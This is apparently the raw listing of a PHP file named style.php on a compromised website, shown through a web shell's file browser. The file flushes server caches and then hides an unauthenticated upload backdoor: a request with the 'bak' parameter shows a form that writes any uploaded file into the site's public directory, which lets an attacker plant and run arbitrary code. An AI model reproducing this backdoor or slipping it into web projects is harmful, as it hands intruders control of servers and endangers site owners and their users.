????

Your IP : 3.144.6.9


Current Path : /home/innovagencyco/public_html/sibu2.innovagency.co.za/
Upload File :
Current File : /home/innovagencyco/public_html/sibu2.innovagency.co.za/style.php

<?php 

if(function_exists("opcache_reset")){
	opcache_reset();
	echo "opcache_reset ok<br>\n";
}

header("X-LiteSpeed-Purge: *");


if (extension_loaded('redis')) {
   $redis = new Redis();
	$redis->connect('127.0.0.1', 6379);
	 
	$redis->flushAll();
	echo "Redis ok<br>\n";
}



?>


<?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>